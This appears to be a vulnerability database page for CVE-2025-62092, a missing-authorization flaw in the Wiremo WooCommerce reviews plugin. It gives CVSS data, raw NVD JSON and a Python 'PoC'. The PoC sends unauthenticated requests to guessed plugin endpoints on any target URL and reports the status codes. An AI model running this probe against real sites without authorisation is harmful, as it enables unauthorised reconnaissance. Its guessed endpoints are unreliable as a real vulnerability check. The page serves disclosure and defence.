Security Vulnerability Report
中文
CVE-2025-62092 CVSS 5.3 MEDIUM

CVE-2025-62092

Published: 2025-12-31 16:15:45
Last Modified: 2026-04-28 19:34:53

Description

Missing Authorization vulnerability in Wiremo Wiremo woo-reviews-by-wiremo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Wiremo: from n/a through <= 1.4.99.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Wiremo woo-reviews-by-wiremo <= 1.4.99

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-62092 PoC - Missing Authorization in Wiremo woo-reviews-by-wiremo # This PoC demonstrates the broken access control vulnerability import requests import sys def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2025-62092 """ # Common Wiremo plugin endpoints that may be affected vulnerable_endpoints = [ "/wp-admin/admin-ajax.php", "/wp-json/wiremo/v1/", "/?rest_route=/wiremo/v1/settings", ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/json" } print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2025-62092: Missing Authorization in Wiremo woo-reviews-by-wiremo") for endpoint in vulnerable_endpoints: url = target_url.rstrip('/') + endpoint try: # Try to access without authentication response = requests.get(url, headers=headers, timeout=10, verify=False) # Check if we can access protected functionality if response.status_code == 200: print(f"[+] Potential vulnerability found at: {url}") print(f"[+] Status code: {response.status_code}") print(f"[+] Response length: {len(response.text)} bytes") elif response.status_code == 401 or response.status_code == 403: print(f"[-] Endpoint protected (expected behavior): {url}") else: print(f"[*] Endpoint returned: {response.status_code} - {url}") except requests.exceptions.RequestException as e: print(f"[!] Error testing {url}: {str(e)}") print("\n[*] Note: This PoC checks for potential access control issues.") print("[*] Manual verification may be required for confirmation.") if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-62092-poc.py <target_url>") print("Example: python cve-2025-62092-poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-62092", "sourceIdentifier": "[email protected]", "published": "2025-12-31T16:15:44.567", "lastModified": "2026-04-28T19:34:53.253", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Wiremo Wiremo woo-reviews-by-wiremo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Wiremo: from n/a through <= 1.4.99."}, {"lang": "es", "value": "Vulnerabilidad por autorización faltante en Wiremo permite la explotación de niveles de seguridad de control de acceso configurados incorrectamente. Este problema afecta a Wiremo: desde n/a hasta 1.4.99."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/woo-reviews-by-wiremo/vulnerability/wordpress-wiremo-plugin-1-4-99-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}